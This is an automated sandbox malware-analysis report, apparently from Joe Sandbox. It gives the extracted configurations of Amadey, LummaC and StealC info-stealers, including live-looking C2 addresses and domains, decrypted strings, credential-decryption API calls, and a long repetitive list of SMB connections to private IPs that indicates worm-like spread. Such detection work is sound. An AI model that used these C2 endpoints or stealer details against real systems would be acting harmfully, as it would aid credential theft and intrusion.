                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: file.exeAvira: detected
                          Found malware configuration
                          Source: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: 49.2.e614d88998.exe.400000.1.unpackMalware Configuration Extractor: LummaC {"C2 url": ["dwell-exclaim.biz", "se-blurry.biz", "covery-mover.biz", "drive-connect.cyou", "dare-curbys.biz", "formy-spill.biz", "zinc-sneark.biz", "impend-differ.biz", "print-vexer.biz"], "Build id": "FATE99--test"}
                          Source: b6866cbf49.exe.7356.27.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 66%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exeReversingLabs: Detection: 65%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exeReversingLabs: Detection: 57%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeReversingLabs: Detection: 71%
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeReversingLabs: Detection: 66%
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeReversingLabs: Detection: 65%
                          Source: C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exeReversingLabs: Detection: 71%
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 57%
                          Source: C:\Users\user\Documents\JEBGCBAFCG.exeReversingLabs: Detection: 57%
                          Multi AV Scanner detection for submitted file
                          Source: file.exeReversingLabs: Detection: 57%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: impend-differ.biz
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: print-vexer.biz
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: dare-curbys.biz
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: covery-mover.biz
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: formy-spill.biz
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: dwell-exclaim.biz
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: zinc-sneark.biz
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: se-blurry.biz
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: drive-connect.cyou
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: TeslaBrowser/5.5
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: - Screen Resoluton:
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: - Physical Installed Memory:
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: Workgroup: -
                          Source: 49.2.e614d88998.exe.400000.1.unpackString decryptor: FATE99--test
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040B006 CryptUnprotectData,LocalAlloc,LocalFree,7_2_0040B006
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00414B70 CryptBinaryToStringA,HeapAlloc,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,HeapFree,GetProcessHeap,HeapFree,7_2_00414B70
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B0B26D CryptUnprotectData,LocalAlloc,LocalFree,7_2_00B0B26D
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_00B14DD7 CryptBinaryToStringA,GetProcessHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,7_2_00B14DD7
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00416B7E CryptUnprotectData,8_2_00416B7E

                          Exploits

                          barindex
                          Connects to many different private IPs (likely to spread or exploit)
                          Source: global trafficTCP traffic: 192.168.2.148:445
                          Source: global trafficTCP traffic: 192.168.2.149:445
                          Source: global trafficTCP traffic: 192.168.2.146:445
                          Source: global trafficTCP traffic: 192.168.2.147:445
                          Source: global trafficTCP traffic: 192.168.2.140:445
                          Source: global trafficTCP traffic: 192.168.2.141:445
                          Source: global trafficTCP traffic: 192.168.2.144:445
                          Source: global trafficTCP traffic: 192.168.2.145:445
                          Source: global trafficTCP traffic: 192.168.2.142:445
                          Source: global trafficTCP traffic: 192.168.2.143:445
                          Source: global trafficTCP traffic: 192.168.2.159:445
                          Source: global trafficTCP traffic: 192.168.2.157:445
                          Source: global trafficTCP traffic: 192.168.2.158:445
                          Source: global trafficTCP traffic: 192.168.2.151:445
                          Source: global trafficTCP traffic: 192.168.2.152:445
                          Source: global trafficTCP traffic: 192.168.2.150:445
                          Source: global trafficTCP traffic: 192.168.2.155:445
                          Source: global trafficTCP traffic: 192.168.2.156:445
                          Source: global trafficTCP traffic: 192.168.2.153:445
                          Source: global trafficTCP traffic: 192.168.2.154:445
                          Source: global trafficTCP traffic: 192.168.2.126:445
                          Source: global trafficTCP traffic: 192.168.2.247:445
                          Source: global trafficTCP traffic: 192.168.2.127:445
                          Source: global trafficTCP traffic: 192.168.2.248:445
                          Source: global trafficTCP traffic: 192.168.2.124:445
                          Source: global trafficTCP traffic: 192.168.2.245:445
                          Source: global trafficTCP traffic: 192.168.2.125:445
                          Source: global trafficTCP traffic: 192.168.2.246:445
                          Source: global trafficTCP traffic: 192.168.2.128:445
                          Source: global trafficTCP traffic: 192.168.2.249:445
                          Source: global trafficTCP traffic: 192.168.2.129:445
                          Source: global trafficTCP traffic: 192.168.2.240:445
                          Source: global trafficTCP traffic: 192.168.2.122:445
                          Source: global trafficTCP traffic: 192.168.2.243:445
                          Source: global trafficTCP traffic: 192.168.2.123:445
                          Source: global trafficTCP traffic: 192.168.2.244:445
                          Source: global trafficTCP traffic: 192.168.2.120:445
                          Source: global trafficTCP traffic: 192.168.2.241:445
                          Source: global trafficTCP traffic: 192.168.2.121:445
                          Source: global trafficTCP traffic: 192.168.2.242:445
                          Source: global trafficTCP traffic: 192.168.2.97:445
                          Source: global trafficTCP traffic: 192.168.2.137:445
                          Source: global trafficTCP traffic: 192.168.2.96:445
                          Source: global trafficTCP traffic: 192.168.2.138:445
                          Source: global trafficTCP traffic: 192.168.2.99:445
                          Source: global trafficTCP traffic: 192.168.2.135:445
                          Source: global trafficTCP traffic: 192.168.2.98:445
                          Source: global trafficTCP traffic: 192.168.2.136:445
                          Source: global trafficTCP traffic: 192.168.2.139:445
                          Source: global trafficTCP traffic: 192.168.2.250:445
                          Source: global trafficTCP traffic: 192.168.2.130:445
                          Source: global trafficTCP traffic: 192.168.2.251:445
                          Source: global trafficTCP traffic: 192.168.2.91:445
                          Source: global trafficTCP traffic: 192.168.2.90:445
                          Source: global trafficTCP traffic: 192.168.2.93:445
                          Source: global trafficTCP traffic: 192.168.2.133:445
                          Source: global trafficTCP traffic: 192.168.2.254:445
                          Source: global trafficTCP traffic: 192.168.2.92:445
                          Source: global trafficTCP traffic: 192.168.2.134:445
                          Source: global trafficTCP traffic: 192.168.2.95:445
                          Source: global trafficTCP traffic: 192.168.2.131:445
                          Source: global trafficTCP traffic: 192.168.2.252:445
                          Source: global trafficTCP traffic: 192.168.2.94:445
                          Source: global trafficTCP traffic: 192.168.2.132:445
                          Source: global trafficTCP traffic: 192.168.2.253:445
                          Source: global trafficTCP traffic: 192.168.2.104:445
                          Source: global trafficTCP traffic: 192.168.2.225:445
                          Source: global trafficTCP traffic: 192.168.2.105:445
                          Source: global trafficTCP traffic: 192.168.2.226:445
                          Source: global trafficTCP traffic: 192.168.2.102:445
                          Source: global trafficTCP traffic: 192.168.2.223:445
                          Source: global trafficTCP traffic: 192.168.2.103:445
                          Source: global trafficTCP traffic: 192.168.2.224:445
                          Source: global trafficTCP traffic: 192.168.2.108:445
                          Source: global trafficTCP traffic: 192.168.2.229:445
                          Source: global trafficTCP traffic: 192.168.2.109:445
                          Source: global trafficTCP traffic: 192.168.2.106:445
                          Source: global trafficTCP traffic: 192.168.2.227:445
                          Source: global trafficTCP traffic: 192.168.2.107:445
                          Source: global trafficTCP traffic: 192.168.2.228:445
                          Source: global trafficTCP traffic: 192.168.2.100:445
                          Source: global trafficTCP traffic: 192.168.2.221:445
                          Source: global trafficTCP traffic: 192.168.2.101:445
                          Source: global trafficTCP traffic: 192.168.2.222:445
                          Source: global trafficTCP traffic: 192.168.2.220:445
                          Source: global trafficTCP traffic: 192.168.2.115:445
                          Source: global trafficTCP traffic: 192.168.2.236:445
                          Source: global trafficTCP traffic: 192.168.2.116:445
                          Source: global trafficTCP traffic: 192.168.2.237:445
                          Source: global trafficTCP traffic: 192.168.2.113:445
                          Source: global trafficTCP traffic: 192.168.2.234:445
                          Source: global trafficTCP traffic: 192.168.2.114:445
                          Source: global trafficTCP traffic: 192.168.2.235:445
                          Source: global trafficTCP traffic: 192.168.2.119:445
                          Source: global trafficTCP traffic: 192.168.2.117:445
                          Source: global trafficTCP traffic: 192.168.2.238:445
                          Source: global trafficTCP traffic: 192.168.2.118:445
                          Source: global trafficTCP traffic: 192.168.2.239:445
                          Source: global trafficTCP traffic: 192.168.2.111:445
                          Source: global trafficTCP traffic: 192.168.2.232:445
                          Source: global trafficTCP traffic: 192.168.2.112:445
                          Source: global trafficTCP traffic: 192.168.2.233:445
                          Source: global trafficTCP traffic: 192.168.2.230:445
                          Source: global trafficTCP traffic: 192.168.2.110:445
                          Source: global trafficTCP traffic: 192.168.2.231:445
                          Source: global trafficTCP traffic: 192.168.2.203:445
                          Source: global trafficTCP traffic: 192.168.2.204:445
                          Source: global trafficTCP traffic: 192.168.2.201:445
                          Source: global trafficTCP traffic: 192.168.2.202:445
                          Source: global trafficTCP traffic: 192.168.2.207:445
                          Source: global trafficTCP traffic: 192.168.2.208:445
                          Source: global trafficTCP traffic: 192.168.2.205:445
                          Source: global trafficTCP traffic: 192.168.2.206:445
                          Source: global trafficTCP traffic: 192.168.2.200:445
                          Source: global trafficTCP traffic: 192.168.2.209:445
                          Source: global trafficTCP traffic: 192.168.2.214:445
                          Source: global trafficTCP traffic: 192.168.2.215:445
                          Source: global trafficTCP traffic: 192.168.2.212:445
                          Source: global trafficTCP traffic: 192.168.2.213:445
                          Source: global trafficTCP traffic: 192.168.2.218:445
                          Source: global trafficTCP traffic: 192.168.2.219:445
                          Source: global trafficTCP traffic: 192.168.2.216:445
                          Source: global trafficTCP traffic: 192.168.2.217:445
                          Source: global trafficTCP traffic: 192.168.2.210:445
                          Source: global trafficTCP traffic: 192.168.2.211:445
                          Source: global trafficTCP traffic: 192.168.2.39:445
                          Source: global trafficTCP traffic: 192.168.2.38:445
                          Source: global trafficTCP traffic: 192.168.2.42:445
                          Source: global trafficTCP traffic: 192.168.2.41:445
                          Source: global trafficTCP traffic: 192.168.2.44:445
                          Source: global trafficTCP traffic: 192.168.2.43:445
                          Source: global trafficTCP traffic: 192.168.2.46:445
                          Source: global trafficTCP traffic: 192.168.2.45:445
                          Source: global trafficTCP traffic: 192.168.2.48:445
                          Source: global trafficTCP traffic: 192.168.2.47:445
                          Source: global trafficTCP traffic: 192.168.2.40:445
                          Source: global trafficTCP traffic: 192.168.2.28:445
                          Source: global trafficTCP traffic: 192.168.2.27:445
                          Source: global trafficTCP traffic: 192.168.2.29:445
                          Source: global trafficTCP traffic: 192.168.2.31:445
                          Source: global trafficTCP traffic: 192.168.2.30:445
                          Source: global trafficTCP traffic: 192.168.2.33:445
                          Source: global trafficTCP traffic: 192.168.2.32:445
                          Source: global trafficTCP traffic: 192.168.2.35:445
                          Source: global trafficTCP traffic: 192.168.2.34:445
                          Source: global trafficTCP traffic: 192.168.2.37:445
                          Source: global trafficTCP traffic: 192.168.2.36:445
                          Source: global trafficTCP traffic: 192.168.2.17:445
                          Source: global trafficTCP traffic: 192.168.2.16:445
                          Source: global trafficTCP traffic: 192.168.2.19:445
                          Source: global trafficTCP traffic: 192.168.2.18:445
                          Source: global trafficTCP traffic: 192.168.2.20:445
                          Source: global trafficTCP traffic: 192.168.2.22:445
                          Source: global trafficTCP traffic: 192.168.2.21:445
                          Source: global trafficTCP traffic: 192.168.2.24:445
                          Source: global trafficTCP traffic: 192.168.2.23:445
                          Source: global trafficTCP traffic: 192.168.2.26:445
                          Source: global trafficTCP traffic: 192.168.2.25:445
                          Source: global trafficTCP traffic: 192.168.2.11:445
                          Source: global trafficTCP traffic: 192.168.2.10:445
                          Source: global trafficTCP traffic: 192.168.2.13:445
                          Source: global trafficTCP traffic: 192.168.2.12:445
                          Source: global trafficTCP traffic: 192.168.2.15:445
                          Source: global trafficTCP traffic: 192.168.2.14:445
                          Source: global trafficTCP traffic: 192.168.2.0:445
                          Source: global trafficTCP traffic: 192.168.2.2:445
                          Source: global trafficTCP traffic: 192.168.2.1:445
                          Source: global trafficTCP traffic: 192.168.2.180:445
                          Source: global trafficTCP traffic: 192.168.2.181:445
                          Source: global trafficTCP traffic: 192.168.2.8:445
                          Source: global trafficTCP traffic: 192.168.2.7:445
                          Source: global trafficTCP traffic: 192.168.2.9:445
                          Source: global trafficTCP traffic: 192.168.2.4:445
                          Source: global trafficTCP traffic: 192.168.2.3:445
                          Source: global trafficTCP traffic: 192.168.2.6:445
                          Source: global trafficTCP traffic: 192.168.2.5:445
                          Source: global trafficTCP traffic: 192.168.2.86:445
                          Source: global trafficTCP traffic: 192.168.2.85:445
                          Source: global trafficTCP traffic: 192.168.2.88:445
                          Source: global trafficTCP traffic: 192.168.2.87:445
                          Source: global trafficTCP traffic: 192.168.2.89:445
                          Source: global trafficTCP traffic: 192.168.2.184:445
                          Source: global trafficTCP traffic: 192.168.2.185:445
                          Source: global trafficTCP traffic: 192.168.2.80:445
                          Source: global trafficTCP traffic: 192.168.2.182:445
                          Source: global trafficTCP traffic: 192.168.2.183:445
                          Source: global trafficTCP traffic: 192.168.2.82:445
                          Source: global trafficTCP traffic: 192.168.2.188:445
                          Source: global trafficTCP traffic: 192.168.2.81:445
                          Source: global trafficTCP traffic: 192.168.2.189:445
                          Source: global trafficTCP traffic: 192.168.2.84:445
                          Source: global trafficTCP traffic: 192.168.2.186:445
                          Source: global trafficTCP traffic: 192.168.2.83:445
                          Source: global trafficTCP traffic: 192.168.2.187:445
                          Source: global trafficTCP traffic: 192.168.2.191:445
                          Source: global trafficTCP traffic: 192.168.2.192:445
                          Source: global trafficTCP traffic: 192.168.2.190:445
                          Source: global trafficTCP traffic: 192.168.2.75:445
                          Source: global trafficTCP traffic: 192.168.2.74:445
                          Source: global trafficTCP traffic: 192.168.2.77:445
                          Source: global trafficTCP traffic: 192.168.2.76:445
                          Source: global trafficTCP traffic: 192.168.2.79:445
                          Source: global trafficTCP traffic: 192.168.2.78:445
                          Source: global trafficTCP traffic: 192.168.2.195:445
                          Source: global trafficTCP traffic: 192.168.2.196:445
                          Source: global trafficTCP traffic: 192.168.2.193:445
                          Source: global trafficTCP traffic: 192.168.2.194:445
                          Source: global trafficTCP traffic: 192.168.2.71:445
                          Source: global trafficTCP traffic: 192.168.2.199:445
                          Source: global trafficTCP traffic: 192.168.2.70:445
                          Source: global trafficTCP traffic: 192.168.2.73:445
                          Source: global trafficTCP traffic: 192.168.2.197:445
                          Source: global trafficTCP traffic: 192.168.2.72:445
                          Source: global trafficTCP traffic: 192.168.2.198:445
                          Source: global trafficTCP traffic: 192.168.2.64:445
                          Source: global trafficTCP traffic: 192.168.2.63:445
                          Source: global trafficTCP traffic: 192.168.2.66:445
                          Source: global trafficTCP traffic: 192.168.2.168:445
                          Source: global trafficTCP traffic: 192.168.2.65:445
                          Source: global trafficTCP traffic: 192.168.2.169:445
                          Source: global trafficTCP traffic: 192.168.2.68:445
                          Source: global trafficTCP traffic: 192.168.2.67:445
                          Source: global trafficTCP traffic: 192.168.2.69:445
                          Source: global trafficTCP traffic: 192.168.2.162:445
                          Source: global trafficTCP traffic: 192.168.2.163:445
                          Source: global trafficTCP traffic: 192.168.2.160:445
                          Source: global trafficTCP traffic: 192.168.2.161:445
                          Source: global trafficTCP traffic: 192.168.2.60:445
                          Source: global trafficTCP traffic: 192.168.2.166:445
                          Source: global trafficTCP traffic: 192.168.2.167:445
                          Source: global trafficTCP traffic: 192.168.2.62:445
                          Source: global trafficTCP traffic: 192.168.2.164:445
                          Source: global trafficTCP traffic: 192.168.2.61:445
                          Source: global trafficTCP traffic: 192.168.2.165:445
                          Source: global trafficTCP traffic: 192.168.2.170:445
                          Source: global trafficTCP traffic: 192.168.2.49:445
                          Source: global trafficTCP traffic: 192.168.2.53:445
                          Source: global trafficTCP traffic: 192.168.2.52:445
                          Source: global trafficTCP traffic: 192.168.2.55:445
                          Source: global trafficTCP traffic: 192.168.2.179:445
                          Source: global trafficTCP traffic: 192.168.2.54:445
                          Source: global trafficTCP traffic: 192.168.2.57:445
                          Source: global trafficTCP traffic: 192.168.2.56:445
                          Source: global trafficTCP traffic: 192.168.2.59:445
                          Source: global trafficTCP traffic: 192.168.2.58:445
                          Source: global trafficTCP traffic: 192.168.2.173:445
                          Source: global trafficTCP traffic: 192.168.2.174:445
                          Source: global trafficTCP traffic: 192.168.2.171:445
                          Source: global trafficTCP traffic: 192.168.2.172:445
                          Source: global trafficTCP traffic: 192.168.2.177:445
                          Source: global trafficTCP traffic: 192.168.2.178:445
                          Source: global trafficTCP traffic: 192.168.2.51:445
                          Source: global trafficTCP traffic: 192.168.2.175:445
                          Source: global trafficTCP traffic: 192.168.2.50:445
                          Source: global trafficTCP traffic: 192.168.2.176:445
                          Connects to many different private IPs via SMB (likely to spread or exploit)
                          Source: global trafficTCP traffic: 192.168.2.148:445
                          Source: global trafficTCP traffic: 192.168.2.149:445
                          Source: global trafficTCP traffic: 192.168.2.146:445
                          Source: global trafficTCP traffic: 192.168.2.147:445
                          Source: global trafficTCP traffic: 192.168.2.140:445
                          Source: global trafficTCP traffic: 192.168.2.141:445
                          Source: global trafficTCP traffic: 192.168.2.144:445
                          Source: global trafficTCP traffic: 192.168.2.145:445
                          Source: global trafficTCP traffic: 192.168.2.142:445
                          Source: global trafficTCP traffic: 192.168.2.143:445
                          Source: global trafficTCP traffic: 192.168.2.159:445
                          Source: global trafficTCP traffic: 192.168.2.157:445
                          Source: global trafficTCP traffic: 192.168.2.158:445
                          Source: global trafficTCP traffic: 192.168.2.151:445
                          Source: global trafficTCP traffic: 192.168.2.152:445
                          Source: global trafficTCP traffic: 192.168.2.150:445
                          Source: global trafficTCP traffic: 192.168.2.155:445
                          Source: global trafficTCP traffic: 192.168.2.156:445
                          Source: global trafficTCP traffic: 192.168.2.153:445
                          Source: global trafficTCP traffic: 192.168.2.154:445
                          Source: global trafficTCP traffic: 192.168.2.126:445
                          Source: global trafficTCP traffic: 192.168.2.247:445
                          Source: global trafficTCP traffic: 192.168.2.127:445
                          Source: global trafficTCP traffic: 192.168.2.248:445
                          Source: global trafficTCP traffic: 192.168.2.124:445
                          Source: global trafficTCP traffic: 192.168.2.245:445
                          Source: global trafficTCP traffic: 192.168.2.125:445
                          Source: global trafficTCP traffic: 192.168.2.246:445
                          Source: global trafficTCP traffic: 192.168.2.128:445
                          Source: global trafficTCP traffic: 192.168.2.249:445
                          Source: global trafficTCP traffic: 192.168.2.129:445
                          Source: global trafficTCP traffic: 192.168.2.240:445
                          Source: global trafficTCP traffic: 192.168.2.122:445
                          Source: global trafficTCP traffic: 192.168.2.243:445
                          Source: global trafficTCP traffic: 192.168.2.123:445
                          Source: global trafficTCP traffic: 192.168.2.244:445
                          Source: global trafficTCP traffic: 192.168.2.120:445
                          Source: global trafficTCP traffic: 192.168.2.241:445
                          Source: global trafficTCP traffic: 192.168.2.121:445
                          Source: global trafficTCP traffic: 192.168.2.242:445
                          Source: global trafficTCP traffic: 192.168.2.97:445
                          Source: global trafficTCP traffic: 192.168.2.137:445
                          Source: global trafficTCP traffic: 192.168.2.96:445
                          Source: global trafficTCP traffic: 192.168.2.138:445
                          Source: global trafficTCP traffic: 192.168.2.99:445
                          Source: global trafficTCP traffic: 192.168.2.135:445
                          Source: global trafficTCP traffic: 192.168.2.98:445
                          Source: global trafficTCP traffic: 192.168.2.136:445
                          Source: global trafficTCP traffic: 192.168.2.139:445
                          Source: global trafficTCP traffic: 192.168.2.250:445
                          Source: global trafficTCP traffic: 192.168.2.130:445
                          Source: global trafficTCP traffic: 192.168.2.251:445
                          Source: global trafficTCP traffic: 192.168.2.91:445
                          Source: global trafficTCP traffic: 192.168.2.90:445
                          Source: global trafficTCP traffic: 192.168.2.93:445
                          Source: global trafficTCP traffic: 192.168.2.133:445
                          Source: global trafficTCP traffic: 192.168.2.254:445
                          Source: global trafficTCP traffic: 192.168.2.92:445
                          Source: global trafficTCP traffic: 192.168.2.134:445
                          Source: global trafficTCP traffic: 192.168.2.95:445
                          Source: global trafficTCP traffic: 192.168.2.131:445
                          Source: global trafficTCP traffic: 192.168.2.252:445
                          Source: global trafficTCP traffic: 192.168.2.94:445
                          Source: global trafficTCP traffic: 192.168.2.132:445
                          Source: global trafficTCP traffic: 192.168.2.253:445
                          Source: global trafficTCP traffic: 192.168.2.104:445
                          Source: global trafficTCP traffic: 192.168.2.225:445
                          Source: global trafficTCP traffic: 192.168.2.105:445
                          Source: global trafficTCP traffic: 192.168.2.226:445
                          Source: global trafficTCP traffic: 192.168.2.102:445
                          Source: global trafficTCP traffic: 192.168.2.223:445
                          Source: global trafficTCP traffic: 192.168.2.103:445
                          Source: global trafficTCP traffic: 192.168.2.224:445
                          Source: global trafficTCP traffic: 192.168.2.108:445
                          Source: global trafficTCP traffic: 192.168.2.229:445
                          Source: global trafficTCP traffic: 192.168.2.109:445
                          Source: global trafficTCP traffic: 192.168.2.106:445
                          Source: global trafficTCP traffic: 192.168.2.227:445
                          Source: global trafficTCP traffic: 192.168.2.107:445
                          Source: global trafficTCP traffic: 192.168.2.228:445
                          Source: global trafficTCP traffic: 192.168.2.100:445
                          Source: global trafficTCP traffic: 192.168.2.221:445
                          Source: global trafficTCP traffic: 192.168.2.101:445
                          Source: global trafficTCP traffic: 192.168.2.222:445
                          Source: global trafficTCP traffic: 192.168.2.220:445
                          Source: global trafficTCP traffic: 192.168.2.115:445
                          Source: global trafficTCP traffic: 192.168.2.236:445
                          Source: global trafficTCP traffic: 192.168.2.116:445
                          Source: global trafficTCP traffic: 192.168.2.237:445
                          Source: global trafficTCP traffic: 192.168.2.113:445
                          Source: global trafficTCP traffic: 192.168.2.234:445
                          Source: global trafficTCP traffic: 192.168.2.114:445
                          Source: global trafficTCP traffic: 192.168.2.235:445
                          Source: global trafficTCP traffic: 192.168.2.119:445
                          Source: global trafficTCP traffic: 192.168.2.117:445
                          Source: global trafficTCP traffic: 192.168.2.238:445
                          Source: global trafficTCP traffic: 192.168.2.118:445
                          Source: global trafficTCP traffic: 192.168.2.239:445
                          Source: global trafficTCP traffic: 192.168.2.111:445
                          Source: global trafficTCP traffic: 192.168.2.232:445
                          Source: global trafficTCP traffic: 192.168.2.112:445
                          Source: global trafficTCP traffic: 192.168.2.233:445
                          Source: global trafficTCP traffic: 192.168.2.230:445
                          Source: global trafficTCP traffic: 192.168.2.110:445
                          Source: global trafficTCP traffic: 192.168.2.231:445
                          Source: global trafficTCP traffic: 192.168.2.203:445
                          Source: global trafficTCP traffic: 192.168.2.204:445
                          Source: global trafficTCP traffic: 192.168.2.201:445
                          Source: global trafficTCP traffic: 192.168.2.202:445
                          Source: global trafficTCP traffic: 192.168.2.207:445
                          Source: global trafficTCP traffic: 192.168.2.208:445
                          Source: global trafficTCP traffic: 192.168.2.205:445
                          Source: global trafficTCP traffic: 192.168.2.206:445
                          Source: global trafficTCP traffic: 192.168.2.200:445
                          Source: global trafficTCP traffic: 192.168.2.209:445
                          Source: global trafficTCP traffic: 192.168.2.214:445
                          Source: global trafficTCP traffic: 192.168.2.215:445
                          Source: global trafficTCP traffic: 192.168.2.212:445
                          Source: global trafficTCP traffic: 192.168.2.213:445
                          Source: global trafficTCP traffic: 192.168.2.218:445
                          Source: global trafficTCP traffic: 192.168.2.219:445
                          Source: global trafficTCP traffic: 192.168.2.216:445
                          Source: global trafficTCP traffic: 192.168.2.217:445
                          Source: global trafficTCP traffic: 192.168.2.210:445
                          Source: global trafficTCP traffic: 192.168.2.211:445
                          Source: global trafficTCP traffic: 192.168.2.39:445
                          Source: global trafficTCP traffic: 192.168.2.38:445
                          Source: global trafficTCP traffic: 192.168.2.42:445
                          Source: global trafficTCP traffic: 192.168.2.41:445
                          Source: global trafficTCP traffic: 192.168.2.44:445
                          Source: global trafficTCP traffic: 192.168.2.43:445
                          Source: global trafficTCP traffic: 192.168.2.46:445
                          Source: global trafficTCP traffic: 192.168.2.45:445
                          Source: global trafficTCP traffic: 192.168.2.48:445
                          Source: global trafficTCP traffic: 192.168.2.47:445
                          Source: global trafficTCP traffic: 192.168.2.40:445
                          Source: global trafficTCP traffic: 192.168.2.28:445
                          Source: global trafficTCP traffic: 192.168.2.27:445
                          Source: global trafficTCP traffic: 192.168.2.29:445
                          Source: global trafficTCP traffic: 192.168.2.31:445
                          Source: global trafficTCP traffic: 192.168.2.30:445
                          Source: global trafficTCP traffic: 192.168.2.33:445
                          Source: global trafficTCP traffic: 192.168.2.32:445
                          Source: global trafficTCP traffic: 192.168.2.35:445
                          Source: global trafficTCP traffic: 192.168.2.34:445
                          Source: global trafficTCP traffic: 192.168.2.37:445
                          Source: global trafficTCP traffic: 192.168.2.36:445
                          Source: global trafficTCP traffic: 192.168.2.17:445
                          Source: global trafficTCP traffic: 192.168.2.16:445
                          Source: global trafficTCP traffic: 192.168.2.19:445
                          Source: global trafficTCP traffic: 192.168.2.18:445
                          Source: global trafficTCP traffic: 192.168.2.20:445
                          Source: global trafficTCP traffic: 192.168.2.22:445
                          Source: global trafficTCP traffic: 192.168.2.21:445
                          Source: global trafficTCP traffic: 192.168.2.24:445
                          Source: global trafficTCP traffic: 192.168.2.23:445
                          Source: global trafficTCP traffic: 192.168.2.26:445
                          Source: global trafficTCP traffic: 192.168.2.25:445
                          Source: global trafficTCP traffic: 192.168.2.11:445
                          Source: global trafficTCP traffic: 192.168.2.10:445
                          Source: global trafficTCP traffic: 192.168.2.13:445
                          Source: global trafficTCP traffic: 192.168.2.12:445
                          Source: global trafficTCP traffic: 192.168.2.15:445
                          Source: global trafficTCP traffic: 192.168.2.14:445
                          Source: global trafficTCP traffic: 192.168.2.0:445
                          Source: global trafficTCP traffic: 192.168.2.2:445
                          Source: global trafficTCP traffic: 192.168.2.1:445
                          Source: global trafficTCP traffic: 192.168.2.180:445
                          Source: global trafficTCP traffic: 192.168.2.181:445
                          Source: global trafficTCP traffic: 192.168.2.8:445
                          Source: global trafficTCP traffic: 192.168.2.7:445
                          Source: global trafficTCP traffic: 192.168.2.9:445
                          Source: global trafficTCP traffic: 192.168.2.4:445
                          Source: global trafficTCP traffic: 192.168.2.3:445
                          Source: global trafficTCP traffic: 192.168.2.6:445
                          Source: global trafficTCP traffic: 192.168.2.5:445
                          Source: global trafficTCP traffic: 192.168.2.86:445
                          Source: global trafficTCP traffic: 192.168.2.85:445
                          Source: global trafficTCP traffic: 192.168.2.88:445
                          Source: global trafficTCP traffic: 192.168.2.87:445
                          Source: global trafficTCP traffic: 192.168.2.89:445
                          Source: global trafficTCP traffic: 192.168.2.184:445
                          Source: global trafficTCP traffic: 192.168.2.185:445
                          Source: global trafficTCP traffic: 192.168.2.80:445
                          Source: global trafficTCP traffic: 192.168.2.182:445
                          Source: global trafficTCP traffic: 192.168.2.183:445
                          Source: global trafficTCP traffic: 192.168.2.82:445
                          Source: global trafficTCP traffic: 192.168.2.188:445
                          Source: global trafficTCP traffic: 192.168.2.81:445
                          Source: global trafficTCP traffic: 192.168.2.189:445
                          Source: global trafficTCP traffic: 192.168.2.84:445
                          Source: global trafficTCP traffic: 192.168.2.186:445
                          Source: global trafficTCP traffic: 192.168.2.83:445
                          Source: global trafficTCP traffic: 192.168.2.187:445
                          Source: global trafficTCP traffic: 192.168.2.191:445
                          Source: global trafficTCP traffic: 192.168.2.192:445
                          Source: global trafficTCP traffic: 192.168.2.190:445
                          Source: global trafficTCP traffic: 192.168.2.75:445
                          Source: global trafficTCP traffic: 192.168.2.74:445
                          Source: global trafficTCP traffic: 192.168.2.77:445
                          Source: global trafficTCP traffic: 192.168.2.76:445
                          Source: global trafficTCP traffic: 192.168.2.79:445
                          Source: global trafficTCP traffic: 192.168.2.78:445
                          Source: global trafficTCP traffic: 192.168.2.195:445
                          Source: global trafficTCP traffic: 192.168.2.196:445
                          Source: global trafficTCP traffic: 192.168.2.193:445
                          Source: global trafficTCP traffic: 192.168.2.194:445
